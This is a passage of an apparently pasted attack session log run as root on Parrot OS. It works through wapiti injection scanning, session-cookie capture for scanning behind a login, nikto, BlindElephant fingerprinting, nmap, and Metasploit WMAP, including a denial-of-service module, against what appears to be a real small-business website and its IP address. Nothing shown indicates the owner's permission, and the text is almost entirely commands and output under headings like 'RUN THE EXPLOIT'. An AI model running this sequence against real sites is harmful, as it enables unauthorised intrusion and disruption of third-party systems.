  1206. adding 198.71.232.0/24 mode `UDPscan' ports `7,9,11,13,17,19,20,37,39,42,49,52-54,65-71,81,111,161,123,136-170,514-518,630,631,636-640,650,653,921,1023-1030,1900,2048-2050,27900,27960,32767-32780,32831' pps 300
  1207. using interface(s) eth0
  1208. scaning 2.56e+02 total hosts with 2.66e+04 total packets, should take a little longer than 1 Minutes, 35 Seconds
  1209. UDP open 192.168.1.1:53 ttl 64
  1210.  
  1211. --snip--
  1212.  
  1213. CHECK THE SITE WITH WAPITI
  1214.  
  1215. ┌─[root@parrot]─[~]
  1216. └──╼ #wapiti http://www.vyxunbnbs.com/ -n 10 -b folder -u -v 1 -f html -o /tmp/scan_report
  1217. Wapiti-2.3.0 (wapiti.sourceforge.net)
  1218.  
  1219. [*] Loading modules:
  1220. mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htaccess, mod_blindsql, mod_permanentxss, mod_nikto
  1221.  
  1222. [+] Launching module exec
  1223. + attackGET http://www.vyxunbnbs.com/
  1224. + attackGET http://www.vyxunbnbs.com/site.css?v=
  1225. + attackGET http://www.vyxunbnbs.com/common/wsb/core
  1226. + attackGET http://www.vyxunbnbs.com/libs/knockout/knockout
  1227. + attackGET http://www.vyxunbnbs.com/home.html
  1228. + attackGET http://www.vyxunbnbs.com/contact.html
  1229. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
  1230. + attackGET http://www.vyxunbnbs.com/products.html
  1231. + attackGET http://www.vyxunbnbs.com/bullet-jewellery.html
  1232. + attackGET http://www.vyxunbnbs.com/boar-tusk-necklaces.html
  1233. + attackGET http://www.vyxunbnbs.com/decorated-skulls-.html
  1234. + attackGET http://www.vyxunbnbs.com/bone-art.html
  1235. + attackGET http://www.vyxunbnbs.com/leather-crafting.html
  1236. + attackGET http://www.vyxunbnbs.com/wooden-items.html
  1237. + attackGET http://www.vyxunbnbs.com/random-items.html
  1238. + attackGET http://www.vyxunbnbs.com/WSB.ForceDesktop
  1239. + attackGET http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
  1240. + attackGET http://www.vyxunbnbs.com/designer/iebackground/iebackground
  1241. + attackGET http://www.vyxunbnbs.com/.view-as-mobile
  1242. + attackGET http://www.vyxunbnbs.com/.wsb-canvas-page-container
  1243. + attackGET http://www.vyxunbnbs.com/vyxunbnbs.com
  1244. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
  1245. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
  1246. + attackGET http://www.vyxunbnbs.com/Loading...
  1247. + attackGET http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
  1248. + attackGET http://www.vyxunbnbs.com/plugins/twitter/index.php
  1249. + attackGET http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
  1250.  
  1251. [+] Launching module file
  1252. + attackGET http://www.vyxunbnbs.com/
  1253. + attackGET http://www.vyxunbnbs.com/site.css?v=
  1254. + attackGET http://www.vyxunbnbs.com/common/wsb/core
  1255. + attackGET http://www.vyxunbnbs.com/libs/knockout/knockout
  1256. + attackGET http://www.vyxunbnbs.com/home.html
  1257. + attackGET http://www.vyxunbnbs.com/contact.html
  1258. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
  1259. + attackGET http://www.vyxunbnbs.com/products.html
  1260. + attackGET http://www.vyxunbnbs.com/bullet-jewellery.html
  1261. + attackGET http://www.vyxunbnbs.com/boar-tusk-necklaces.html
  1262. + attackGET http://www.vyxunbnbs.com/decorated-skulls-.html
  1263. + attackGET http://www.vyxunbnbs.com/bone-art.html
  1264. + attackGET http://www.vyxunbnbs.com/leather-crafting.html
  1265. + attackGET http://www.vyxunbnbs.com/wooden-items.html
  1266. + attackGET http://www.vyxunbnbs.com/random-items.html
  1267. + attackGET http://www.vyxunbnbs.com/WSB.ForceDesktop
  1268. + attackGET http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
  1269. + attackGET http://www.vyxunbnbs.com/designer/iebackground/iebackground
  1270. + attackGET http://www.vyxunbnbs.com/.view-as-mobile
  1271. + attackGET http://www.vyxunbnbs.com/.wsb-canvas-page-container
  1272. + attackGET http://www.vyxunbnbs.com/vyxunbnbs.com
  1273. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
  1274. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
  1275. + attackGET http://www.vyxunbnbs.com/Loading...
  1276. + attackGET http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
  1277. + attackGET http://www.vyxunbnbs.com/plugins/twitter/index.php
  1278. + attackGET http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
  1279.  
  1280. [+] Launching module sql
  1281. + attackGET http://www.vyxunbnbs.com/
  1282. + attackGET http://www.vyxunbnbs.com/site.css?v=
  1283. + attackGET http://www.vyxunbnbs.com/common/wsb/core
  1284. + attackGET http://www.vyxunbnbs.com/libs/knockout/knockout
  1285. + attackGET http://www.vyxunbnbs.com/home.html
  1286. + attackGET http://www.vyxunbnbs.com/contact.html
  1287. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
  1288. + attackGET http://www.vyxunbnbs.com/products.html
  1289. + attackGET http://www.vyxunbnbs.com/bullet-jewellery.html
  1290. + attackGET http://www.vyxunbnbs.com/boar-tusk-necklaces.html
  1291. + attackGET http://www.vyxunbnbs.com/decorated-skulls-.html
  1292. + attackGET http://www.vyxunbnbs.com/bone-art.html
  1293. + attackGET http://www.vyxunbnbs.com/leather-crafting.html
  1294. + attackGET http://www.vyxunbnbs.com/wooden-items.html
  1295. + attackGET http://www.vyxunbnbs.com/random-items.html
  1296. + attackGET http://www.vyxunbnbs.com/WSB.ForceDesktop
  1297. + attackGET http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
  1298. + attackGET http://www.vyxunbnbs.com/designer/iebackground/iebackground
  1299. + attackGET http://www.vyxunbnbs.com/.view-as-mobile
  1300. + attackGET http://www.vyxunbnbs.com/.wsb-canvas-page-container
  1301. + attackGET http://www.vyxunbnbs.com/vyxunbnbs.com
  1302. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
  1303. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
  1304. + attackGET http://www.vyxunbnbs.com/Loading...
  1305. + attackGET http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
  1306. + attackGET http://www.vyxunbnbs.com/plugins/twitter/index.php
  1307. + attackGET http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
  1308.  
  1309. [+] Launching module xss
  1310. + attackGET http://www.vyxunbnbs.com/
  1311. + attackGET http://www.vyxunbnbs.com/site.css?v=
  1312. + attackGET http://www.vyxunbnbs.com/common/wsb/core
  1313. + attackGET http://www.vyxunbnbs.com/libs/knockout/knockout
  1314. + attackGET http://www.vyxunbnbs.com/home.html
  1315. + attackGET http://www.vyxunbnbs.com/contact.html
  1316. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
  1317. + attackGET http://www.vyxunbnbs.com/products.html
  1318. + attackGET http://www.vyxunbnbs.com/bullet-jewellery.html
  1319. + attackGET http://www.vyxunbnbs.com/boar-tusk-necklaces.html
  1320. + attackGET http://www.vyxunbnbs.com/decorated-skulls-.html
  1321. + attackGET http://www.vyxunbnbs.com/bone-art.html
  1322. + attackGET http://www.vyxunbnbs.com/leather-crafting.html
  1323. + attackGET http://www.vyxunbnbs.com/wooden-items.html
  1324. + attackGET http://www.vyxunbnbs.com/random-items.html
  1325. + attackGET http://www.vyxunbnbs.com/WSB.ForceDesktop
  1326. + attackGET http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
  1327. + attackGET http://www.vyxunbnbs.com/designer/iebackground/iebackground
  1328. + attackGET http://www.vyxunbnbs.com/.view-as-mobile
  1329. + attackGET http://www.vyxunbnbs.com/.wsb-canvas-page-container
  1330. + attackGET http://www.vyxunbnbs.com/vyxunbnbs.com
  1331. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
  1332. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
  1333. + attackGET http://www.vyxunbnbs.com/Loading...
  1334. + attackGET http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
  1335. + attackGET http://www.vyxunbnbs.com/plugins/twitter/index.php
  1336. + attackGET http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
  1337.  
  1338. [+] Launching module blindsql
  1339. + attackGET http://www.vyxunbnbs.com/
  1340. + attackGET http://www.vyxunbnbs.com/site.css?v=
  1341. + attackGET http://www.vyxunbnbs.com/common/wsb/core
  1342. + attackGET http://www.vyxunbnbs.com/libs/knockout/knockout
  1343. + attackGET http://www.vyxunbnbs.com/home.html
  1344. + attackGET http://www.vyxunbnbs.com/contact.html
  1345. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
  1346. + attackGET http://www.vyxunbnbs.com/products.html
  1347. + attackGET http://www.vyxunbnbs.com/bullet-jewellery.html
  1348. + attackGET http://www.vyxunbnbs.com/boar-tusk-necklaces.html
  1349. + attackGET http://www.vyxunbnbs.com/decorated-skulls-.html
  1350. + attackGET http://www.vyxunbnbs.com/bone-art.html
  1351. + attackGET http://www.vyxunbnbs.com/leather-crafting.html
  1352. + attackGET http://www.vyxunbnbs.com/wooden-items.html
  1353. + attackGET http://www.vyxunbnbs.com/random-items.html
  1354. + attackGET http://www.vyxunbnbs.com/WSB.ForceDesktop
  1355. + attackGET http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
  1356. + attackGET http://www.vyxunbnbs.com/designer/iebackground/iebackground
  1357. + attackGET http://www.vyxunbnbs.com/.view-as-mobile
  1358. + attackGET http://www.vyxunbnbs.com/.wsb-canvas-page-container
  1359. + attackGET http://www.vyxunbnbs.com/vyxunbnbs.com
  1360. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
  1361. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
  1362. + attackGET http://www.vyxunbnbs.com/Loading...
  1363. + attackGET http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
  1364. + attackGET http://www.vyxunbnbs.com/plugins/twitter/index.php
  1365. + attackGET http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
  1366.  
  1367. [+] Launching module permanentxss
  1368. + http://www.vyxunbnbs.com/
  1369. + http://www.vyxunbnbs.com/site.css?v=
  1370. + http://www.vyxunbnbs.com/common/wsb/core
  1371. + http://www.vyxunbnbs.com/libs/knockout/knockout
  1372. + http://www.vyxunbnbs.com/home.html
  1373. + http://www.vyxunbnbs.com/contact.html
  1374. + http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
  1375. + http://www.vyxunbnbs.com/products.html
  1376. + http://www.vyxunbnbs.com/bullet-jewellery.html
  1377. + http://www.vyxunbnbs.com/boar-tusk-necklaces.html
  1378. + http://www.vyxunbnbs.com/decorated-skulls-.html
  1379. + http://www.vyxunbnbs.com/bone-art.html
  1380. + http://www.vyxunbnbs.com/leather-crafting.html
  1381. + http://www.vyxunbnbs.com/wooden-items.html
  1382. + http://www.vyxunbnbs.com/random-items.html
  1383. + http://www.vyxunbnbs.com/WSB.ForceDesktop
  1384. + http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
  1385. + http://www.vyxunbnbs.com/designer/iebackground/iebackground
  1386. + http://www.vyxunbnbs.com/.view-as-mobile
  1387. + http://www.vyxunbnbs.com/.wsb-canvas-page-container
  1388. + http://www.vyxunbnbs.com/vyxunbnbs.com
  1389. + http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
  1390. + http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
  1391. + http://www.vyxunbnbs.com/Loading...
  1392. + http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
  1393. + http://www.vyxunbnbs.com/plugins/twitter/index.php
  1394. + http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
  1395.  
  1396. Report
  1397. ------
  1398. A report has been generated in the file /tmp/scan_report
  1399. Open /tmp/scan_report/index.html with a browser to see this report.
  1400.  
  1401. ┌─[root@parrot]─[~]
  1402. └──╼ #firefox /tmp/scan_report/index.html
  1403.  
  1404.  
  1405. ...........................
  1406. Note
  1407. ========
  1408. This scan has been saved in the file /root/.wapiti/scans/www.vyxunbnbs.com.xml
  1409. You can use it to perform attacks without scanning again the web site with the "-k" parameter
  1410.  
  1411.  
  1412. NOTE
  1413.  
  1414. wapiti works better when you use the cookie value.
  1415.  
  1416. To get the cookie use the getcookie.py script
  1417.  
  1418. Use getcookie.py.
  1419.  
  1420. Usage: python getcookie.py <cookie_file> <url_with_form>
  1421.  
  1422. It will dump the cookie to the file. After getting the cookie set Powerfuzzer to use it (Cookie button in the GUI)
  1423.  
  1424. Cookies are save in LWP format. (LWPCookieJar)
  1425.  
  1426. #LWP-Cookies-2.0
  1427. Set-Cookie3: SID=a0b498e88f488dd8a48baf6778da85b9; path="/"; domain="test.com"; path_spec; discard; version=0
  1428.  
  1429.  
  1430. ┌─[✗]─[root@parrot]─[/usr/share/powerfuzzer]
  1431. └──╼ #./getcookie.py ~/cookie.txt http://www.vyxunbnbs.com/webapp/login.php
  1432.  
  1433. Enter username/password etc as required to complete the login form
  1434.  
  1435. Script exists, check the contents of ~/cookie.txt – it will look something like :
  1436.  
  1437. #LWP-Cookies-2.0
  1438.  
  1439. Set-Cookie3: PHPSESSID=3d20841af5de43c718732d80e5d78fe3; path=”/”; domain=”orange”; path_spec; expires=”2010-01-04 22:42:47Z”; version=0
  1440.  
  1441. Now we can use wapiti to test any urls ‘behind’ the login screen (as it were) :
  1442.  
  1443. wapiti http://www.vyxunbnbs.com/webapp/search.php –cookie ~/cookie.txt -v 2 -o ~/report -x http://www.vyxunbnbs.com/webapp/logout.php
  1444.  
  1445. (We need to exclude the logout page, else our session will get destroyed when wapiti spiders that page…)
  1446.  
  1447.  
  1448. USE BLINDELEPHANT
  1449.  
  1450. https://media.blackhat.com/bh-us-10/presentations/Thomas/BlackHat-USA-2010-Thomas-BlindElephant-WebApp-Fingerprinting-slides.pdf
  1451.  
  1452. BlindElephant.py http://www.somesite.com appName
  1453.  
  1454. BlindElephant.py http://forum.somesite.com phpbb
  1455.  
  1456. ┌─[root@parrot]─[~]
  1457. └──╼ #BlindElephant.py www.vyxunbnbs.com movabletype
  1458. Loaded /usr/lib/pymodules/python2.7/blindelephant/dbs/movabletype.pkl with 101 versions, 2229 differentiating paths, and 216 version groups.
  1459. Starting BlindElephant fingerprint for version of movabletype at http://www.vyxunbnbs.com
  1460.  
  1461. Hit http://www.vyxunbnbs.com/mt-static/mt.js
  1462. File produced no match. Error: Failed to reach a server: timed out
  1463.  
  1464. Hit http://www.vyxunbnbs.com/mt-static/js/tc/client.js
  1465. File produced no match. Error: Failed to reach a server: timed out
  1466.  
  1467.  
  1468. Error: All versions ruled out!
  1469.  
  1470.  
  1471.  
  1472. CHECK THE SITE WITH NIKTO
  1473.  
  1474. ┌─[root@parrot]─[~]
  1475. └──╼ #nikto -h 198.71.232.3
  1476. - Nikto v2.1.6
  1477. ---------------------------------------------------------------------------
  1478. + No web server found on 198.71.232.3:80
  1479. ---------------------------------------------------------------------------
  1480. + 0 host(s) tested
  1481.  
  1482. ┌─[root@parrot]─[~]
  1483. └──╼ #nikto -h 198.71.232.3 -p 443
  1484. - Nikto v2.1.6
  1485. ---------------------------------------------------------------------------
  1486. + Target IP: 198.71.232.3
  1487. + Target Hostname: 198.71.232.3
  1488. + Target Port: 443
  1489. ---------------------------------------------------------------------------
  1490. + SSL Info: Subject: /C=US/ST=Arizona/L=Scottsdale/O=GoDaddy.com, LLC/CN=*.godaddysites.com
  1491. Ciphers: ECDHE-RSA-AES256-GCM-SHA384
  1492. Issuer: /C=US/ST=Arizona/L=Scottsdale/O=GoDaddy.com, Inc./OU=http://certificates.godaddy.com/repository/CN=Go Daddy Secure Certification Authority/serialNumber=07969287
  1493. + Start Time: 2016-05-29 17:25:53 (GMT2)
  1494. ---------------------------------------------------------------------------
  1495. + Server: DPS/1.0.3
  1496. + Cookie dps_site_id created without the secure flag
  1497. + Cookie dps_site_id created without the httponly flag
  1498. + The anti-clickjacking X-Frame-Options header is not present.
  1499. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  1500. + Uncommon header 'x-siteid' found, with contents: 2000
  1501. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  1502. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  1503. + No CGI Directories found (use '-C all' to force check all possible dirs)
  1504. + Server is using a wildcard certificate: *.godaddysites.com
  1505. + Hostname '198.71.232.3' does not match certificate's names: *.godaddysites.com
  1506. + ERROR: Error limit (20) reached for host, giving up. Last error:
  1507. + Scan terminated: 18 error(s) and 9 item(s) reported on remote host
  1508. + End Time: 2016-05-29 18:04:21 (GMT2) (2308 seconds)
  1509. ---------------------------------------------------------------------------
  1510. + 1 host(s) tested
  1511.  
  1512.  
  1513. USE METASPLOIT
  1514.  
  1515. ____ _ ____
  1516. | _ \ __ _ _ __ _ __ ___ | |_/ ___| ___ ___
  1517. | |_) / _` | '__| '__/ _ \| __\___ \ / _ \/ __|
  1518. | __/ (_| | | | | | (_) | |_ ___) | __/ (__
  1519. |_| \__,_|_| |_| \___/ \__|____/ \___|\___|
  1520.  
  1521.  
  1522. executing "msfstart"
  1523.  
  1524. Creating database user 'msf'
  1525. Enter password for new role:
  1526. Enter it again:
  1527. Creating databases 'msf' and 'msf_test'
  1528. Creating configuration file in /usr/share/metasploit-framework/config/database.yml
  1529. Creating initial database schema
  1530. ┌─[root@parrot]─[~]
  1531. └──╼ #msfconsole
  1532.  
  1533. Call trans opt: received. 2-19-98 13:24:18 REC:Loc
  1534.  
  1535. Trace program: running
  1536.  
  1537. wake up, Neo...
  1538. the matrix has you
  1539. follow the white rabbit.
  1540.  
  1541. knock, knock, Neo.
  1542.  
  1543. (`. ,-,
  1544. ` `. ,;' /
  1545. `. ,'/ .'
  1546. `. X /.'
  1547. .-;--''--.._` ` (
  1548. .' / `
  1549. , ` ' Q '
  1550. , , `._ \
  1551. ,.| ' `-.;_'
  1552. : . ` ; ` ` --,.._;
  1553. ' ` , ) .'
  1554. `._ , ' /_
  1555. ; ,''-,;' ``-
  1556. ``-..__``--`
  1557.  
  1558.  
  1559. http://metasploit.pro
  1560.  
  1561.  
  1562. Easy phishing: Set up email templates, landing pages and listeners
  1563. in Metasploit Pro -- learn more on http://rapid7.com/metasploit
  1564.  
  1565. =[ metasploit v4.11.5-2016010401 ]
  1566. + -- --=[ 1517 exploits - 875 auxiliary - 257 post ]
  1567. + -- --=[ 437 payloads - 37 encoders - 8 nops ]
  1568. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  1569.  
  1570. msf >
  1571.  
  1572.  
  1573. CONNECT TO THE POSTGRES DB
  1574.  
  1575. msf > db_connect root:toor
  1576. [-] postgresql already connected to msf
  1577. [-] Run db_disconnect first if you wish to connect to a different database
  1578. msf >
  1579.  
  1580.  
  1581. CHECK DB STATUS
  1582.  
  1583. msf > db_status
  1584. [*] postgresql connected to msf
  1585.  
  1586.  
  1587. USE WMAP
  1588.  
  1589. msf > load wmap
  1590.  
  1591. .-.-.-..-.-.-..---..---.
  1592. | | | || | | || | || |-'
  1593. `-----'`-'-'-'`-^-'`-'
  1594. [WMAP 1.5.1] === et [ ] metasploit.com 2012
  1595. [*] Successfully loaded plugin: wmap
  1596. msf >
  1597.  
  1598. ADD THE SITE
  1599.  
  1600. msf > wmap_sites -a http://www.vyxunbnbs.com
  1601.  
  1602. msf > wmap_sites -l
  1603.  
  1604. ADD THE TARGET
  1605.  
  1606. msf > wmap_targets -t http://198.71.232.3
  1607. msf > wmap_targets -l
  1608. [*] Defined targets
  1609. ===============
  1610.  
  1611. Id Vhost Host Port SSL Path
  1612. -- ----- ---- ---- --- ----
  1613. 0 198.71.232.3 198.71.232.3 80 false /
  1614.  
  1615.  
  1616. RUN THE TEST
  1617.  
  1618. msf > wmap_run -t
  1619. [*] Testing target:
  1620. [*] Site: 198.71.232.3 (198.71.232.3)
  1621. [*] Port: 80 SSL: false
  1622. ============================================================
  1623. [*] Testing started. 2016-05-29 13:37:42 +0200
  1624. [*] Loading wmap modules...
  1625. [*] 40 wmap enabled modules loaded.
  1626. [*]
  1627. =[ SSL testing ]=
  1628. ============================================================
  1629. [*] Target is not SSL. SSL modules disabled.
  1630. [*]
  1631. =[ Web Server testing ]=
  1632. ============================================================
  1633. [*] Module auxiliary/scanner/http/http_version
  1634. [*] Module auxiliary/scanner/http/open_proxy
  1635. [*] Module auxiliary/scanner/http/robots_txt
  1636. [*] Module auxiliary/scanner/http/frontpage_login
  1637. [*] Module auxiliary/scanner/http/host_header_injection
  1638. [*] Module auxiliary/admin/http/tomcat_administration
  1639. [*] Module auxiliary/admin/http/tomcat_utf8_traversal
  1640. [*] Module auxiliary/scanner/http/options
  1641. [*] Module auxiliary/scanner/http/drupal_views_user_enum
  1642. [*] Module auxiliary/scanner/http/scraper
  1643. [*] Module auxiliary/scanner/http/svn_scanner
  1644. [*] Module auxiliary/scanner/http/trace
  1645. [*] Module auxiliary/scanner/http/vhost_scanner
  1646. [*] Module auxiliary/scanner/http/webdav_internal_ip
  1647. [*] Module auxiliary/scanner/http/webdav_scanner
  1648. [*] Module auxiliary/scanner/http/webdav_website_content
  1649. [*]
  1650. =[ File/Dir testing ]=
  1651. ============================================================
  1652. [*] Module auxiliary/dos/http/apache_range_dos
  1653. [*] Module auxiliary/scanner/http/backup_file
  1654. [*] Module auxiliary/scanner/http/brute_dirs
  1655. [*] Module auxiliary/scanner/http/copy_of_file
  1656. [*] Module auxiliary/scanner/http/dir_listing
  1657. [*] Module auxiliary/scanner/http/dir_scanner
  1658. [*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
  1659. [*] Module auxiliary/scanner/http/file_same_name_dir
  1660. [*] Module auxiliary/scanner/http/files_dir
  1661. [*] Module auxiliary/scanner/http/http_put
  1662. [*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
  1663. [*] Module auxiliary/scanner/http/prev_dir_same_name_file
  1664. [*] Module auxiliary/scanner/http/replace_ext
  1665. [*] Module auxiliary/scanner/http/soap_xml
  1666. [*] Module auxiliary/scanner/http/trace_axd
  1667. [*] Module auxiliary/scanner/http/verb_auth_bypass
  1668. [*]
  1669. =[ Unique Query testing ]=
  1670. ============================================================
  1671. [*] Module auxiliary/scanner/http/blind_sql_query
  1672. [*] Module auxiliary/scanner/http/error_sql_injection
  1673. [*] Module auxiliary/scanner/http/http_traversal
  1674. [*] Module auxiliary/scanner/http/rails_mass_assignment
  1675. [*] Module exploit/multi/http/lcms_php_exec
  1676. [*]
  1677. =[ Query testing ]=
  1678. ============================================================
  1679. [*]
  1680. =[ General testing ]=
  1681. ============================================================
  1682. [*] Done.
  1683.  
  1684. All that remains now is to actually run the WMAP scan against our target URL.
  1685.  
  1686. RUN THE EXPLOIT
  1687.  
  1688. msf > wmap_run -e
  1689. [*] Using ALL wmap enabled modules.
  1690. [-] NO WMAP NODES DEFINED. Executing local modules
  1691. [*] Testing target:
  1692. [*] Site: 198.71.232.3 (198.71.232.3)
  1693. [*] Port: 80 SSL: false
  1694. ============================================================
  1695. [*] Testing started. 2016-05-29 13:38:10 +0200
  1696. [*]
  1697. =[ SSL testing ]=
  1698. ============================================================
  1699. [*] Target is not SSL. SSL modules disabled.
  1700. [*]
  1701. =[ Web Server testing ]=
  1702. ============================================================
  1703. [*] Module auxiliary/scanner/http/http_version
  1704.  
  1705. [*] 198.71.232.3:80 DPS/1.0.3
  1706. [*] Module auxiliary/scanner/http/open_proxy
  1707. [*] Module auxiliary/scanner/http/robots_txt
  1708. [*] Module auxiliary/scanner/http/frontpage_login
  1709. [*] http://198.71.232.3/ may not support FrontPage Server Extensions
  1710. [*] Module auxiliary/scanner/http/host_header_injection
  1711. [*] Module auxiliary/admin/http/tomcat_administration
  1712. [*] Module auxiliary/admin/http/tomcat_utf8_traversal
  1713. [*] Attempting to connect to 198.71.232.3:80
  1714. [+] No File(s) found
  1715. [*] Module auxiliary/scanner/http/options
  1716. [*] Module auxiliary/scanner/http/drupal_views_user_enum
  1717. [-] 198.71.232.3 does not appear to be vulnerable, will not continue
  1718. [*] Module auxiliary/scanner/http/scraper
  1719. [*] [198.71.232.3] / [404 Not Found]
  1720. [*] Module auxiliary/scanner/http/svn_scanner
  1721. [*] Using code '404' as not found.
  1722. [*] Module auxiliary/scanner/http/trace
  1723. [*] Module auxiliary/scanner/http/vhost_scanner
  1724. [*] >> Exception during launch from auxiliary/scanner/http/vhost_scanner: The following options failed to validate: DOMAIN.
  1725. [*] Module auxiliary/scanner/http/webdav_internal_ip
  1726. [*] Module auxiliary/scanner/http/webdav_scanner
  1727. [*] Module auxiliary/scanner/http/webdav_website_content
  1728. [*]
  1729. =[ File/Dir testing ]=
  1730. ============================================================
  1731. [*] Module auxiliary/dos/http/apache_range_dos
  1732. [*] Module auxiliary/scanner/http/backup_file
  1733. [*] Module auxiliary/scanner/http/brute_dirs
  1734. [*] Path: /
  1735. [*] Using code '404' as not found.
  1736. [*] Module auxiliary/scanner/http/copy_of_file
  1737. [*] Module auxiliary/scanner/http/dir_listing
  1738. [*] Path: /
  1739. [*] Module auxiliary/scanner/http/dir_scanner
  1740. [*] Path: /
  1741. [*] Detecting error code
  1742. [*] Using code '404' as not found for 198.71.232.3
  1743. [*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
  1744. [*] Path: /
  1745. [*] Using code '404' as not found.
  1746. [*] Module auxiliary/scanner/http/file_same_name_dir
  1747. [*] Path: /
  1748. [-] Blank or default PATH set.
  1749. [*] Module auxiliary/scanner/http/files_dir
  1750. [*] Path: /
  1751. [*] Using code '404' as not found for files with extension .null
  1752. [*] Module auxiliary/scanner/http/http_put
  1753. [*] Path: /
  1754. [-] File doesn't seem to exist. The upload probably failed.
  1755. [*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
  1756. [*] Path: /
  1757. [-] 198.71.232.3:80 Folder does not require authentication. [404]
  1758. [*] Module auxiliary/scanner/http/prev_dir_same_name_file
  1759. [*] Path: /
  1760. [-] Blank or default PATH set.
  1761. [*] Module auxiliary/scanner/http/replace_ext
  1762. [*] Module auxiliary/scanner/http/soap_xml
  1763. [*] Path: /
  1764. [*] Starting scan with 0ms delay between requests
  1765. [-] The connection timed out (198.71.232.3:80).
  1766. [-] The connection timed out (198.71.232.3:80).
  1767. [*] Module auxiliary/scanner/http/trace_axd
  1768. [*] Path: /
  1769. [*] Module auxiliary/scanner/http/verb_auth_bypass
  1770. [*]
  1771. =[ Unique Query testing ]=
  1772. ============================================================
  1773. [*] Module auxiliary/scanner/http/blind_sql_query
  1774. [*] Module auxiliary/scanner/http/error_sql_injection
  1775. [*] Module auxiliary/scanner/http/http_traversal
  1776. [*] Module auxiliary/scanner/http/rails_mass_assignment
  1777. [*] Module exploit/multi/http/lcms_php_exec
  1778. [*]
  1779. =[ Query testing ]=
  1780. ============================================================
  1781. [*]
  1782. =[ General testing ]=
  1783. ============================================================
  1784. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  1785. Launch completed in 8302.240582227707 seconds.
  1786. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  1787. [*] Done.
  1788.  
  1789. Once the scan has finished executing, we take a look at the database to see if WMAP found anything of interest.
  1790.  
  1791.  
  1792. CHECK THE VULNERABILITIES
  1793.  
  1794. msf > wmap_vulns -l
  1795. [*] + [198.71.232.3] (198.71.232.3): scraper /
  1796. [*] scraper Scraper
  1797. [*] GET 404 Not Found
  1798.  
  1799.  
  1800. EXECUTE VULNERABILITIES
  1801.  
  1802. msf > vulns
  1803.  
  1804.  
  1805. RUN DB_NMAP
  1806.  
  1807. msf > db_nmap 198.71.232.3 -PN
  1808. [*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 17:31 CEST
  1809. [*] Nmap: 'mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers'
  1810. [*] Nmap: Nmap scan report for 198.71.232.3
  1811. [*] Nmap: Host is up (0.11s latency).
  1812. [*] Nmap: Not shown: 998 filtered ports
  1813. [*] Nmap: PORT STATE SERVICE
  1814. [*] Nmap: 80/tcp open http
  1815. [*] Nmap: 443/tcp open https
  1816. [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 13.02 seconds
  1817.  
  1818. EXPORT NMAP RESULTS
  1819.  
  1820. msf > db_export -f xml /root/Desktop/Exported.xml
  1821. [*] Starting export of workspace default to /root/Desktop/Exported.xml [ xml ]...
  1822. [*] >> Starting export of report
  1823. [*] >> Starting export of hosts
  1824. [*] >> Starting export of events
  1825. [*] >> Starting export of services
  1826. [*] >> Starting export of web sites
  1827. [*] >> Starting export of web pages
  1828. [*] >> Starting export of web forms
  1829. [*] >> Starting export of web vulns
  1830. [*] >> Starting export of module details
  1831. [*] >> Finished export of report
  1832. [*] Finished export of workspace default to /root/Desktop/Exported.xml [ xml ]...
  1833.  
  1834.  
  1835. IMPORT NMAP RESULTS
  1836.  
  1837. msf > db_import /root/Desktop/Exported.xml
  1838.  
